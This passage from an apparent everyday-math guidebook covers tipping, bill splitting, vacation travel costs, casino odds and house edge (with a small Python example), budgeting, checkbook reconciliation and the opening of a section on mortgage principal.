| Hair stylist | 15-20 percent |
| Shampoo person | $2.00 ($5.00 in Beverly Hills) |
| Manicurist | 15 percent |
| Hotel bellhop | $1.00 per bag |
| Hotel maid | $5.00-$10.00 per stay |
| Skycap at airport | $1.00 per bag |
| Bartender | $1.00 per round of drinks |
| Coatroom attendant | $1.00 |
| Valet | $1.00 at the mall, $2.00 at a nice hotel |


Splitting hairs and bills 


You’ve probably gone out with a group of friends or the gang from 
the office. Did you ever get skinned when the bill came? Though 
they mean no harm, some of your friends or co-workers may 
miscalculate what they owe, forget drinks they ordered, and get 
amnesia about tipping, leaving you holding the bag. The old rule of 
thumb for work lunches used to be, “Don’t be the last one to leave 
the table.” 


No more. When your group is settling up, pull out your smart- 
phone, the one with the great calculator, and then calculate each 
person’s food, tax, and tip charges. Here’s the calculation: 


total = (food + drink) + tax + tip 


Follow these steps: 


1. Figure out the total food and drink cost for each diner. 


Say that your friend Wanda ordered a cheeseburger ($6.00) 
and coffee ($2.00). 


$6.00 + $2.00 = $8.00 
Food and drink amounts to $8.00. 


2. Figure the amount of tax for this diner and then combine 
the tax with the food and drink cost. 


Say that sales tax in your area is 9 percent.

tax = (food + drink) x tax rate
tax = $8.00 x 0.09
tax = $0.72

Wanda’s share of the sales tax is $0.72. Combine that with
the food and drink cost and she owes $8.72 before you
calculate the tip.


Some states charge higher than normal tax rates (as high 
as 20 percent total) for mixed drinks. In Arkansas, the extra 
tax is called a “supplemental mixed drink tax.” Keep this in 
mind as you calculate the tax. 


3. Calculate this diner’s tip amount. 


Suppose that your group has agreed that a 15 percent tip is 
fair. 


tip = (food, drinks, and tax) x tip percentage 
tip = $8.72 x 0.15 
tip = $1.31


Wanda’s share of the tip should be $1.31. Now return to the 
original full calculation: 


total = (food + drink) + tax + tip 
total = $8.00 + $0.72 + $1.31 
total = $10.03 


Wanda’s share of the bill is $10.03. 
4. Repeat this process for everyone in your party. 


If you do, you’ll have enough money to pay the check. 


For large groups (usually eight or more people, although some
restaurants consider a group of six to be “large”), restaurants love
to charge mandatory tips. In the Olden Days, the amount was
15 percent, but it has risen to 18 percent and sometimes 20 percent.
The law says that a tip is mandatory when it’s written on menus,
in brochures, or in ads. And, if anybody in your group asks you,
mandatory tips are subject to sales tax.


Taking a Vacation: 
To Drive or to Fly? 


Some people would say that visiting the Walt Disney World Resort 
(informally known as Disney World) or similar theme parks is a 
dream vacation. Others prefer quiet cabins in the woods or cottages 
on a beachfront. Some like travelling to places where they can take 
in shows or museums. 
Whatever your dream vacation is, you can calculate the full cost
pretty easily, simply by adding up the travel expenses, the lodging 
expenses, any necessary ticket purchases, food, and other things, 
such as souvenirs and excursion costs. Figure 9-2 shows expenses 
anticipated by a family of four planning a trip to Walt Disney 
World. 


THE WHOLE VACATION 

Item Cost 
Airfare $1,800.00 
Hotel $1,204.00 
Disney World $952.00 
Rental Car $329.00 
Food $1,120.00 
Souvenirs $300.00 
TOTAL $5,705.00 

Figure 9-2: Costs associated with a Disney World vacation.


The quandary that many families face is whether to drive or fly. To 
decide, you need to figure up the costs associated with each mode 
of transportation and then compare them. In the following sections, 
I help you identify the different expenses and explain how to do 
the calculations that can help you decide. 


Leaving on a jet plane 


Traveling by air has obvious advantages, the most significant being 
how quickly you arrive at your destination. But is it always the 
best choice, especially when you're flying with others (like your 
spouse and kids)? 


The first thing to consider is the cost of the airfare. How much 
does a round-trip ticket cost? If you buy at the last minute, you'll 
pay full fare, but if you buy well in advance on the Internet, you'll 
save some big bucks. Multiply the cost of a single ticket by the 
number of people traveling with you. Say that your family is made 
up of you, your spouse, and your two children, ages 8 and 10. (By 
the way, both of your children are “adults” on an airline.) You 
multiply the airfare by 4. 


To determine airfare costs, simply go to the airline’s site to see 
what flights are available and how much the fare is. You can exit 
the site without buying anything, if you’re just investigating. 
When you travel by air, however, the cost of the plane tickets isn’t
the only travel expense you'll incur. Here are other costs you need 
to figure in your calculations: 


Long-term parking: To figure parking, multiply the daily rate 
by the number of days you'll be gone. Of course, you can 
ignore this cost if your kind brother offers to drive your family 
to the airport. 


Car rental or transportation fees: Unless you are going to a
resort that you don’t plan to leave, chances are you'll rent a 
car at your destination or take public transportation or taxis 
to get to various places you want to go. 


After you have the amounts for the expenses you'll incur if you fly, 
add them together. This is the amount you’ll compare to the costs 
associated with driving. 


As an example, say you book airfare well in advance of your 
vacation. The fare is $275.00 to get there and $175.00 to get back. 
Together that’s $450.00 per traveler. Since four people are in your 
party, the airfare would total $1,800.00. 


As a bonus, assume that your family will be dropped off and picked 
up at the airport (no cost!) and that you'll take a free shuttle from 
your destination airport to the resort. 


Driving: The daring alternative 


You didn’t grow up to become a cost accountant, but sometimes 
you have to act like one. You need to do the calculations necessary 
to see whether you save money by driving to your destination. 
Fortunately, the math is pretty simple: addition, subtraction, 
multiplication, and division. 


To calculate roughly how much driving will cost, you first need to 
determine the distance, which will give you an idea of how long 
you'll be on the road. Fortunately, you don’t even have to make 
assumptions or guess. You can use an Internet map to find exactly 
how many miles you'll drive to reach your destination. 


Say you’re driving from Sacramento (near where I live) and heading
to Disney World. You'll drive 2,890 miles. That’s 45 hours of driving,
at an average speed of 65 mph. If you can stand driving 8 hours per
day, you’ll be on the road for a little more than 5 days (45 ÷ 8 = 5
with a remainder of 5). You drive into Orlando on the 6th day.
After you know how many miles you’re driving and how many days
you'll be on the road, you can do the other calculations: 


Gasoline: To determine how much gas you'll use, divide the
number of miles by the miles per gallon your car gets. If you
can get 30 miles per gallon in gas mileage, you'll use 96.33
gallons getting there (2,890 ÷ 30 = 96.33). Because you also
have to drive back, double that to get 192.67 gallons. (The gas
you use driving around Orlando is the same as you'd use in 
a rental car, so it doesn’t matter for this calculation.) But to 
make the math easy, call gas consumption 200 gallons. 


To figure how much you’ll pay for those 200 gallons, multiply 
that by the price of a gallon. If you assume gasoline averages 
$4.00 per gallon over the whole trip, you'll pay about $800.00 
for the gas. 


Hotel: You have to figure the hotel costs for every night you 
spend on the road. The good news is that hotel rates are
generally cheaper along the route than they are in popular
destinations. Maybe you can find a place to stay for about
$90.00 a night. Multiply that amount by the number of nights
you'll be traveling. In the Disney example, you'll be staying 
at hotels for 5 nights and driving into Orlando on the 6th 
day. Your on-the-road hotel costs are $450.00 ($90.00 x 5 = 
$450.00). 


Meals: For each day travelling, figure in the cost for all the
meals you'll eat en route. In the Sacramento-to-Disney World 
example, you’re on the road for 5 days, you have 4 people 
in your party, and you eat 3 times a day. Multiply to get the 
number of meals you’ll buy while traveling: 5 x 4 x 3 = 60 
meals. Estimate an average meal cost per person per meal — 
say it’s $5.00 — and multiply that by the number of meals: 
60 x $5.00 = $300.00 for food. 


Now, add all the items together: $450.00 + $800.00 + $300.00 = 
$1,550.00. If you compare travel by car ($1,550.00) to travel by air 
($1,800.00) you save a little bit of money ($250.00) by driving. 


There are hidden costs (and maybe benefits) in driving and you 
should be aware of them. You will be spending more than 10 travel 
days in a car with your family. The experience could bring you all 
closer or make you crazy. Also, consider opportunity cost, the value 
of the next best use of your time. You, your spouse, and your 
children will lose 10 days on the road. Maybe there are better 
things to do with your time than driving 5,780 miles. 
Gambling: Money You Take to
Las Vegas Stays in Las Vegas 


Ah, the lure of the tables! Las Vegas, Atlantic City, and the 
Mississippi River are big destination resorts where, rumor has it, 
you can play casino games. Native American gaming is also wildly 
popular, and there are 400 of these establishments. Besides big 
casinos, many other forms of gambling exist. Some of the most 
popular are lotteries (in the United States, 43 states and the 
District of Columbia have lotteries), office sports pools, and bingo. 


If gambling appeals to you, you’d probably prefer winning to 
losing. That means that you should know some of the math 
involved and be able to calculate one or two important numbers. 


Understanding odds, 
bets, and payouts 


Every casino game consists of placing a bet (sometimes called 
making a wager). Betting applies to non-casino games, too, such as 
card games and parimutuel betting (“playing the ponies”). To state
the obvious, you bet money that a favorable outcome will occur. If 
it does, you get a payout. 


Knowing your odds 


Odds are the ratio of unfavorable outcomes to favorable outcomes.
Odds are essentially the same as probability, but expressed
differently (refer to Chapter 3 for more info and some math examples
related to probability). In rolling a die, the probability of rolling a
1 is 1 chance in 6, or 1/6. There’s 1 favorable outcome and
5 unfavorable outcomes. The odds are expressed as 5:1, and you’d
say it as “5 to 1 against.”


There are odds for everything from a roll of the dice in craps to 
drawing to an inside straight in poker (which is known as a fool’s 
bet or sucker bet, because the odds are 47:4 against). If you want 
to be an informed gambler, know the odds associated with the 
game you're playing. Use the Internet and books to learn particulars 
of your favorite games. 
Understanding types of bets


There are many classes of bets. Concern yourself with the two 
major ones: 


Fair odds bet: A fair odds bet pays off in exact proportion
to the odds. If two people make a bet with each other, without
the services of a bookmaker or casino, the return is equal
to the risk. For example, if two people bet $1.00 that something
will happen, the winner gets his or her $1.00 back
plus the other person’s $1.00. The loser loses $1.00. An office
sports pool usually works this way.


Viggorish bet: A bet that includes an allowance for the person
or business conducting a game (a bookmaker or a casino)
isn’t a fair odds bet. If it were, the “house” would go out of
business. I explain how a viggorish bet works in the next section.


Knowing payouts and house edge 


Gambling facilities aren’t charities; they need to make money. 
Almost all bets include a fee of some sort. 


The viggorish (also known as the vig, the juice, the cut, the rake, or 
the take) is the amount charged by a bookie or casino for giving 
you the privilege of gambling. The word comes from the Yiddish, 
probably from Russian, and means “winnings” (but not for you). 


A common term is house edge (also known as house advantage). 
It’s the percentage the house takes in on various bets. This term 
comes up again and again in assessing the best and worst bets. 
In some cases, the house edge is easy to calculate, but many bets 
require the work of a mathematician. (But don’t worry; there are 
many sources that tell you the precise house edge.) 


The closer to 0 percent a house edge is for a bet, the better the bet 
is for you. In general, any bet with a house edge of 2 percent or less 
(as in some craps bets, for example) is a good one. 


Playing the most popular games 


Should you visit casinos, you'll find (and maybe play) the most 
popular casino games. The only rules you need to follow are to 
pick your favorite games, know how to play them, and use math to 
help you improve your odds of winning. 
The house edge and roulette


Some formulas for calculating the house edge are pretty simple. Take roulette. 
The roulette wheel has numbers from 1 to 36, plus 0 and 00, giving 38 possible 
places where the ball may fall. The payout is 35 times the bet (35:1). The difference 
between 38 (true odds) and 35 (payout) is important. In roulette, if you bet on a 
single number, you have a probability of 1/38 of winning and a probability of 37/38 
of losing. 


A common bet is one on “red or black.” The payout is 1:1, so if you win, you get your
bet back plus an equal amount in winnings. The table has 18 black numbers and 18
red numbers. The wheel has 18 black and 20 non-black numbers (which also means 
that it has 18 red and 20 non-red numbers). 


To find the house edge, subtract the probability of an unfavorable outcome (20/38 
in this case) from the probability of a favorable outcome (18/38 in this case), and 
multiply the result by 100. To make a long story short, the house edge for roulette 
is 5.26 percent, making a roulette bet a fairly bad bet. The number 5.26 applies to 
every possible bet on the table. Can a casino make money on the house edge of 
“just” 5.26 percent? You'd better believe it! 


Here's a tip: If you're dying to play roulette, go to Europe. European roulette wheels 
have only a 0; there’s no 00. As a result, the house edge drops to 2.70 percent. 


Slots 


The slot machine (also known as the one-armed bandit) is 
enormously popular — the most popular casino game of all. 
Casinos are filled with hundreds or thousands of slot machines. 


Slot machines are a poor form of gambling, because people lose a 
good deal more than they win. Slot machines are typically 
programmed to pay out 82-98 percent of the money put in. 


On the road to Reno (I live nearby), billboards advertise “loose” 
slots, which means the casino is promising bigger payouts. Local 
casinos put the increasing payout amount of progressive slots on 
electronic signs on freeway billboards! (A progressive jackpot is a 
huge amount — $250,000, for example — that increases with 
every play of a bunch of “linked” machines.) In 2006, a man won 
$21 million in a Nevada Megabucks jackpot. (You can watch the 
current Megabucks in Nevada payout amount climb at
http://www.megajackpots.com/games/megabucks-in-nevada.aspx.)
Mother knows best


For reasons I cannot explain, my mother never passed by a slot machine that didn’t
like her. She once showed me the results of a little trip to Las Vegas — eighteen
$100 bills, all won playing quarter slots. She went to Vegas so often that the casinos
thought she was a high roller and sent her coupons for free rooms, free meals, and 
free satin jackets. 


Once, while my father was just checking in to the hotel, she put three quarters in 
a machine and immediately hit a $250.00 jackpot — before the ink was dry on the 
registration form. Her advice: Always play three coins, not two or one. 
You hear a lot of lore about slots. One story is that casinos make
them looser early in the week to attract more customers on off-days. 
Another story is that the loose machines are located near the main 
entrance, so the noise from jackpots attracts customers from the 
street. In the past, the casino made a slot looser by changing the 
colorful belts on the reels; today, the casino just reprograms the 
machine. 


Blackjack 


Customers like blackjack (sometimes called “21”) because it’s easy 
to play. Casinos like blackjack because customers lose so much. 


With blackjack, you see the two cards you were dealt. You see one 
of the two cards the dealer dealt himself or herself. The object is 
to take more cards, as needed, to bring your hand up to 21 points 
without going over 21 points (busting). 


To judge how close you are to 21, you add up the values of the 
cards. Each card is worth the number you see on it (its pip value). 
Jacks, queens, and kings have a value of 10. You can treat an ace as 
either 1 point or 11 points. 


Based on your cards, the dealer’s card, and some underlying 
probabilities, you decide whether to hit (take more cards), stand 
pat (take no more cards), double down (increase your bet and take 
only one more card), or split (divide a pair into two hands and 
make an additional bet). 
When to stand: Stand when you’re holding 17-20 points, no
matter what card the dealer is showing (the upcard).


When to hit: Hit when your cards total 5-8 points, no matter
what upcard the dealer is showing.


When to split: Split a pair of aces or 8s, no matter what
upcard the dealer is showing.


When to double down: Double down when you’re holding
10 or 11 points, except when the dealer’s upcard is a 10 or an
ace.


Broad strategies for winning at blackjack exist, too. Here’s a list of 
strategies you can use to improve your odds and avoid bad bets: 


Following the basic strategy: The most important technique 
for winning at blackjack is to follow what’s known as basic 
strategy, which says that, in playing any hand, you make the 
best decision possible (based on the work of professional 
mathematicians). Doing so can lower the house edge to less 
than 1 percent. You can visit
http://en.wikipedia.org/wiki/Blackjack#Blackjack_strategy to see 230 distinct
scenarios for decisions.


Counting cards: With card counting, you track the relationship 
between high-value cards (good for the player) and low-value 
cards (good for the dealer). If you learn how to count cards, 
you could get a 1-2 percent edge over the casino. To become 
a “counter,” prepare to spend maybe 150 hours practicing the 
technique, plus time learning how not to be spotted. 


Very broadly, your betting strategy is to increase your bets 
when the deck is “running in your favor.” Decrease your bets 
when the deck is “running against you.” Don’t be obvious, 
such as switching from a $5.00 bet to a $100.00 bet, because it 
draws the pit boss’s attention. 


Counting isn’t illegal, not by any means. But casinos don’t like 
it, and if you’re spotted, they may permanently bar you, and 
they may alert other casinos. For the movie version of card 
counting, rent the film Rain Man, starring Dustin Hoffman and 
Tom Cruise. 


Avoiding the hunch play: In the hunch play, you deviate from 
basic strategy. Guessing at the outcome (and being ignorant 
of how to play the game) costs most people a lot of money. 


Avoiding the insurance bet: An “insurance” bet is a side bet 
you make when the dealer’s showing an ace. It’s a bad idea. 
The house edge is about 8 percent, so forget about it. 
Craps

Craps is a dice game, prominent in the movies and Broadway 
musicals. It’s based on the outcome of one or more rolls of a pair 
of dice. The one person throwing the dice (the shooter) bets on the 
outcome, but so does everyone else around the craps table. 


Very briefly, here are the rules for craps: The shooter’s first roll is
the comeout roll. If the comeout roll is a 2 (snake eyes), a 3 (craps),
or a 12 (boxcars), the shooter loses. If the comeout roll is a 7 or
11 (a natural), the shooter wins. Any other roll (4, 5, 6, 8, 9, or 10)
establishes the shooter’s “point.” The shooter has to roll dice —
again and again, if necessary — to either make the point or lose.
The shooter makes the point in order to win, but if he or she rolls a
7 before making the point, he or she loses.


The shooter and everyone at the table place bets before the
shooter rolls. When the shooter wins, everyone betting with
him or her (a passline bet) wins. If the shooter loses, everyone
betting against him or her (a don’t pass bet) wins. There are other
miscellaneous bets, most of them poor choices.


These bets are the best ones in craps: 


The passline bet: This is a bet that the shooter will make his
or her point. The bet has a low house edge of 1.41 percent. 
Most players make this bet. 


The don’t pass bet: This is a bet that the shooter won’t make 
his or her point. The house edge is 1.14 percent. 


The odds bet: This is the only bet in the casino that doesn’t
have a house edge, meaning it’s paid off at true odds. First, you 
place a bet on the pass line. If the shooter establishes a point 
of 4, 5, 6, 8, 9, or 10 on the comeout roll, you put an additional 
bet behind your first bet and ask for “odds.” If the point is 4 
or 10, the bet pays 2 to 1; if the point is 5 or 9, it pays 3 to 2; if 
the point is 6 or 8, it pays 6 to 5. Of course, the bet pays only 
if the shooter makes the point. 


All the other bets in craps are bad bets. For example, proposition 
bets are bets on the “hard way” (4, 6, 8, or 10, with both dice 
having the same value). So are one-roll bets, including 2 (snake 
eyes), 3 (ace-deuce, or craps), 11 (yo-leven), and 12 (boxcars). The 
house edge can be as high as 16.7 percent, depending on the bet. 
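
The roulette sidebar and the craps bets above all come down to one expected-value calculation, worked here exactly with fractions. The following Python is an added example, not from the book; the function names are assumptions, and so are the even-money payout on the pass line and the 2:1 payout on a roulette dozen, which are standard table rules the text does not state.

```python
from fractions import Fraction


def house_edge(outcomes):
    """House edge of a bet as an exact fraction of the stake.

    outcomes: (probability, net payoff per 1 unit staked) pairs covering
    every result. The edge is the negative of the player's expected payoff.
    """
    outcomes = list(outcomes)
    if sum(p for p, _ in outcomes) != 1:
        raise ValueError("probabilities must sum to 1")
    return -sum(p * payoff for p, payoff in outcomes)


def roulette_edge(winning_pockets, payout_to_one, pockets=38):
    """Edge of a roulette bet; 38 pockets = American wheel, 37 = European."""
    p_win = Fraction(winning_pockets, pockets)
    return house_edge([(p_win, payout_to_one), (1 - p_win, -1)])


# Number of ways two dice can produce each total (7 is the most likely).
WAYS = {total: 6 - abs(7 - total) for total in range(2, 13)}
POINTS = (4, 5, 6, 8, 9, 10)


def p_point_before_seven(point):
    """Only the point and a 7 end the round, so compare just those rolls."""
    return Fraction(WAYS[point], WAYS[point] + WAYS[7])


def pass_line_win_probability():
    """Win on 7 or 11 at the comeout, or establish a point and make it."""
    p = Fraction(WAYS[7] + WAYS[11], 36)
    for point in POINTS:
        p += Fraction(WAYS[point], 36) * p_point_before_seven(point)
    return p


def pass_line_edge():
    p_win = pass_line_win_probability()
    # Assumption: the pass line pays even money (1 to 1).
    return house_edge([(p_win, 1), (1 - p_win, -1)])


# Odds-bet payouts as given in the text: 2 to 1, 3 to 2, 6 to 5.
ODDS_PAYOUT = {4: Fraction(2, 1), 10: Fraction(2, 1),
               5: Fraction(3, 2), 9: Fraction(3, 2),
               6: Fraction(6, 5), 8: Fraction(6, 5)}


def odds_bet_edge(point):
    p_win = p_point_before_seven(point)
    return house_edge([(p_win, ODDS_PAYOUT[point]), (1 - p_win, -1)])


def as_percent(edge):
    return round(float(edge) * 100, 2)


if __name__ == "__main__":
    print("American, single number:", as_percent(roulette_edge(1, 35)), "%")
    print("American, red or black: ", as_percent(roulette_edge(18, 1)), "%")
    print("American, dozen (2:1):  ", as_percent(roulette_edge(12, 2)), "%")
    print("European, single number:",
          as_percent(roulette_edge(1, 35, pockets=37)), "%")
    print("Craps pass line:        ", as_percent(pass_line_edge()), "%")
    for point in POINTS:
        print("Craps odds bet on", point, "->", odds_bet_edge(point))
```

The pass line wins with probability 244/495, slightly under half, which is where its edge comes from; each odds payout exactly cancels the chance of a 7 arriving first, so that bet's edge is zero.
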
Poker


Poker is a card game where player skill is the biggest factor in
determining the winner. Among other things (such as how to
bet and how to bluff), the best players know their odds cold. For
example, they know that in a game of five-card draw, the deck has
1,098,240 pairs (42.3 percent probability of getting one) and only
36 straight flushes (0.00139 percent probability of getting one).


In poker, players compete against each other and not against the 
house. So there’s no house edge, except for a small amount the 
casino takes out of each pot. 


Video poker is also a game of skill. The house edge is small: 0.1 to 
1.4 percent. The payoff schedule may actually pay back more than 
100 percent if you play perfectly. 


The worst casino bets 


The worst casino bets to make are those where the house edge is 
high. Here are three outrageously bad ones: 


Roulette: Bets on the American roulette wheel (with both a 
0 and a 00) have a house edge of 5.26 percent. (For more on 
roulette, go to the sidebar “The house edge and roulette.”) 


Keno: Keno is a game similar to the lottery, except that draws 
are held every few minutes. Bored diners in the casino coffee 
shop fill out forms with possible winning numbers and give 
them to a “runner” while they’re waiting for food. Payoffs are 
low, and the house edge can be 25 percent or higher. 


Big Six: The Big Six wheel (Wheel of Fortune) is a large vertical 
wheel. The dealer gives it a spin, and it turns until a rubber 
pointer stops it at the winning number. The house edge is 
11-14 percent, depending on the bet. 


In this part... 


Personal finance may not be the easiest task in your
life, but it’s definitely one of the most important. The
chapters in this part make investment, insurance, and
business easier. Here you can find information on how
to apply real-life math in the areas of banking, credit,
investments, and insurance. Because these fields have a
language all their own, I explain what the specialized
terms and concepts mean.


As a bonus, I include a chapter on taxes because you can’t
manage your personal finances without knowing a bit
about what goes to the IRS and your state treasurer.


Chapter 10 


Budgets, Bank Accounts, Credit Cards, and More


In This Chapter 
Getting your budget and checkbook in order 


Understanding how interest and amortization affect your mortgage and 
other loans 


Avoiding credit card trouble 
Sifting through savings and other accounts 


Do you ever worry about money? If so, you’re a member of
a very large club. Whereas the term finance used to mainly
mean high finance — the province of giant banks, large corporations,
and the government — now finance is everybody’s concern. The
reason is simple: Income used to be more reliable, expenses were
lower, and ways to borrow were simpler. The world of personal
finance has grown a lot more complex. Fortunately, your real-life
math skills can help you get through the mire.


The great thing is that you don’t need to be a genius to do personal 
finance. In this chapter, I cover budgets, loans, bank accounts, and 
credit — all of which are part of modern life. The math related to 
these topics centers around principal and interest, and it’s very
much the same whether you're dealing with loans or savings. The 
rest of the math is simple addition and subtraction. 


Beginning with a Budget 


Broadly, a budget is a summary of income and expenses that you 
can use to manage money. A budget serves two purposes. First, 
knowing where your money comes from and goes to gives you 
increased control over it right now. Second, you can use a budget 
to plan for the future. 
Identifying what's in a budget


A budget shows income and expenses from all sources. For most 
people, income refers to the salary they receive from their 
employers, but it may also include alimony (spousal support), 
interest, or Social Security benefits. 


Expenses are everything you spend money on. A few big items 
(such as house payment, car payment, insurance, and groceries) 
account for most people’s monthly spending, but the little things 
can add up, too. Figure 10-1 shows a very simple budget. 


Category | Monthly Amount |
Income | |
Salary | $2,600.00 | $2,600.00
Expenses | |
Rent | $900.00 |
Car payment | $360.00 |
Auto insurance | $100.00 |
Food | $320.00 | $1,680.00
Net | | $920.00

Figure 10-1: A simple budget showing basic income and expenses.


The budget in the figure is a good start, but it’s pretty incomplete. 
It shows income from one source, salary. The only expenses listed 
are rent, car payment, auto insurance, and groceries. It’s a rosy 
picture — but it can be a bit misleading because it’s not complete. 
Most budgets are more complex. 


Using your math skills to make a budget


When you create a budget, you use addition, subtraction, 
multiplication, and division. (Head to Chapter 1 for a review of 
these basic operations.) 


Although you can do a budget using paper and pencil, “automated” 
tools can make the process easier. They include online budget 
tools, smartphone apps, and money management software. I think 
the best tool for budgeting is the spreadsheet. You can easily 
update it, and it practically does the math for you. 
If you don’t want to pay for spreadsheet software, get
OpenOffice Calc, part of the Apache OpenOffice suite. It’s owned
by the Apache Software Foundation, a United States non-profit
corporation. Go to http://www.openoffice.org/ for more
information.




To make a complete budget, follow these steps: 


1. List your income and expense items in categories. 


List every income and expense item you can think of. 
Housing, car, insurance, and food are easy to remember, 
because they’re usually the biggest expenses. But don’t 
forget credit card payments, childcare, clothing, savings, 
medical expenses, and recreation. 


Even though certain expenses, such as doctor’s visits, come
up infrequently, putting them in a monthly budget starts 
you thinking about saving to meet them. 




2. Record the dollar amount associated with each item. 


You can note the cost of each weekly, monthly, or annual 
item, as Figure 10-2 shows. At this point, it doesn’t matter 
whether an expense is annual (for example, a doctor’s visit 
or vehicle registration) or weekly (for example, a music 
lesson). You’ll convert everything to a monthly amount in 
the next step. 


Category | Weekly | Annual | Monthly | Total
Income | | | |
Net Salary | $480.00 | | $2,080.00 | $2,080.00
Expenses | | | |
Rent | | | $900.00 |
Car payment | | | $360.00 |
Auto insurance | | | $100.00 |
Food | | | $320.00 |
Physical exam (1 x $200) | | $200.00 | $17.00 |
Dentist (2 x $80) | | $160.00 | $13.00 | $1,710.00
Net | | | | $370.00

Figure 10-2: Note categories and dollar amounts on your budget.


In this example, notice that salary becomes “Net Salary.”
A net salary is the gross salary (say $600.00 per week) with
the payroll deductions subtracted. The result here is about
$480.00 per week.


3. Calculate as needed to convert weekly and annual items 
into monthly numbers. 


Both calculations are easy. To convert a weekly salary into 
a monthly number, multiply it by 52 (the number of weeks 
in a year) and then divide it by 12 (the number of months 
in a year). Here’s an example, using a weekly salary of 
$480.00: 


monthly salary = (weekly salary x 52) /12 

monthly salary = ($480.00 x 52) /12 

monthly salary = $24,960.00 /12 

monthly salary = $2,080 

To convert an annual expense into a monthly expense, just 
divide by 12. Here’s an example using an annual expense of 
$324.00: 

monthly amount = annual amount/12 months 

monthly amount = $324/12 

monthly amount = $27.00 


4. Calculate net spendable income. 


This amount is also called disposable income or discretionary 
income. To calculate it, simply subtract your total expenses 
from your total income. 


Your goal is to have a little money left over. If you don’t 
have money left over, you’re “under water” or “in the red,” 
as many people are. See the next section for some ways 
you can get back in the black. 


Applying budgeting principles 


Your budget should help you see clearly what you make and 
what you spend. With that info at hand, it’s time to take charge. 
Following are typical weak spots that a budget will show: 


No money left: If all your income is consumed by expenses, 
you're living close to the edge. One unexpected expense can 
put you under. 


No savings: A little money in savings can help you meet some 
disasters, such as a major automobile repair. No savings 
means no safety net. 




No allowance for vacation: All work and no play makes Jack 
(or Jill) a dull boy (or girl). 


Each of these scenarios means that you need to make some 
changes. Fortunately, there’s hope! Change isn’t always easy, but 
here are some things you can possibly do to get your budget on 
firmer footing: 


Make more money. Increasing your income isn’t easy, but 
it’s possible. Maybe you can make more money by taking on 
a second job or selling items online. If increasing what you 
bring in is impossible, don’t despair. There are other ways to 
solve this problem. 


Reduce expenses. See where (and if) you can lower expenses. 
You're probably stuck with some payments, but maybe you 
can economize on food or entertainment. See Chapter 5 for 
information about reducing your shopping expenses. 


Live within the budget. At the very least, don’t spend more 
than you already do. Technically, this is called a budget 
constraint. 


Pay down credit cards. Credit cards suck more blood than 
Count Dracula or anyone in the cast of Twilight. When the 
cards are paid off, don’t load them up with debt again. 


Stop spending on things you don’t care about. Take a hard
look at things that aren’t really important to you. Do you 
really need 250 channels on your cable or satellite TV? Do 
you really lust for fast food? If not, reduce those expenses or 
let them go altogether. 


Set goals. Say you want a vacation more than a double bacon
cheeseburger. After you let go of spending on fast food, set a 
vacation goal. Any vacation saving, even as little as $10.00 per 
week (about $40.00 per month), is a good start toward meeting 
your goal. 


Balancing Your Checkbook


Balancing a checkbook, as you very likely know, means keeping 
the balance in your check register in agreement with your bank 
statement. 


The system isn’t perfect, because invariably you make new 
deposits and write new checks while the bank is preparing and 
mailing your monthly statement. The end result is that you have 
a few items in your check register that don’t appear on the 
statement, but you still have to account for them. 
Because the task can get confusing if you aren’t careful, some
people avoid checkbook balancing. Just the same, like eating 
your vegetables, balancing is good for you. You’ve got to do it, or 
you won’t know how much money you really have in your bank 
account. 


Even though balancing a checkbook requires only simple addition
and subtraction skills, the process may seem difficult until you get
used to it. Here’s a simple checkbook balancing method that really
works:


1. Find the date to reconcile to. 


On the bank statement, find the date of the last transaction, 
whether it’s a check clearing, a deposit, or a charge. This 
date is the one you reconcile to. 


2. Find the same (or closest) date in your register. 


Draw a line in your register under the date closest to the 
statement closing date. There’s no need to worry about 
deposits you’ve made or checks you’ve written after that 
date. 


3. Write both balances — the statement balance and 
register balance — on the back of your statement (see 
Figure 10-3). 


4. In your register, check off cleared items and draw a little 
circle next to uncleared items. 


Cleared items are checks, deposits, and ATM transactions 
that the bank shows it processed. 


5. Under the bank’s ending balance, write any uncleared 
items from your register; then subtract the uncleared 
checks (very likely) from the balance and add uncleared 
deposits (not so likely) to the balance. 


Statement

10/31 | Ending balance | $477.21

Register

10/24 | Ending balance | $277.45


Illustration by Wiley, Composition Services Graphics 


Figure 10-3: Write down the balances on the back of your statement. 
6. Under your register balance, write any unrecorded items
from the bank statement. 


Typically, this includes monthly fees and interest, if you 
have a checking account that pays interest. It might also 
include a check you wrote or a deposit you made that you 
forgot to enter in your register. 


In the example in Figure 10-4, you’ve recorded a credit card 
payment that you know about but that the bank hasn’t 
processed yet. You’ve also recorded a monthly fee that the 
bank knows about, but that you haven’t processed yet. 


You're close, but the two balances don’t agree! What’s wrong? 


7. If the balances don’t agree, check your register for math 
errors. 


In the example, you can see a difference of $0.24. So when 
you find an error (usually a math error or a check or 
deposit having been recorded incorrectly), record the 
adjusting item, as shown in Figure 10-5. 


This is great! After adjusting for the error, your register 
balance and the bank’s balance agree — to the penny! 


8. Tidy things up. 


Make sure your register has an entry for each adjusting 
item, including bank fees and/or interest and math/record- 
ing errors. It’s a must, or you’ll have problems when you 
reconcile next month. It’s also nice to mark “AGREES” at 
the reconciling line. 


Useful symbols for your register are DEP (deposit), EFT (electronic 
funds transfer), ATM (ATM or debit card transaction), CHG (for 
monthly fees), and INT (interest). 


Statement

10/31 | Ending balance | $467.21
#1024 | Visa payment | -$200.00
 | | $267.21

Register

10/24 | Ending balance | $277.45
Charge | Monthly fee | -$10.00
 | | $267.45

Figure 10-4: Noting uncleared items.


Statement

10/31 | Ending balance | $467.21
#1024 | Visa payment | -$200.00
 | | $267.21

Register

10/24 | Ending balance | $277.45
Charge | Monthly fee | -$10.00
Adj | Math error | -$0.24
 | | $267.21

AGREES!

Figure 10-5: Adjust for an error in your register.


Homing in on Mortgage Math 


In its simplest terms, a mortgage (called a deed of trust in about 21 
states in the United States) is the loan you get to buy your home. If 
you make the payments, you end up owning the house. If you don’t 
make the payments, the bank forecloses. 


Your first mortgage, the first trust deed, is the most important home 
loan. There are other kinds of home loans, but they are subordinate 
to the first trust deed. 


To put it simply, you pay a down payment (typically 20 percent of 
the home’s selling price), and the bank lends you the rest of the 
price of the home. The amount loaned is the principal, and you 
pledge the house as security (a valuable asset the bank can take if 
you fail to pay off the loan). The loan accrues interest (the money
the bank charges for the loan). You pay off the loan by paying back 
the principal and interest. After that, nothing’s simple. 


Having a PITI party 


Your loan payment is made up of four parts: principal, interest, 
taxes, and insurance — PITI. 


Principal 


The amount you borrow is called the principal. Calculate principal 
as follows: 


principal = selling price - down payment

Principal is also called the loan amount. Other costs are associated
with closing the loan transaction. They are one-time-only fees; 
they’re separate from the basic loan, but they can usually be 
added to the loan amount. 


